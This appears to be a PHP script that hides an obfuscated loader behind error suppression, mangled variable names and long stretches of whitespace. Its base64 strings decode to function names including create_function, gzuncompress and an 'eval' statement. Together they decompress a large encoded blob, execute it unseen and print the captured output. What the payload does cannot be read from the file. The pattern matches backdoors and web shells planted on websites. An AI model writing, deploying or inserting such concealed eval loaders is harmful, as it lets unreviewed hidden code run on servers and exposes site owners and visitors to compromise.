<?php 
 error_reporting(0);
        $__='printf';$_='Loading the  ...';
        



































































































        $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='Q1JFQXRlX2Z1bkNUaU9u';
                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';
        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


































































































                                                                                                                                                                                                                     $________;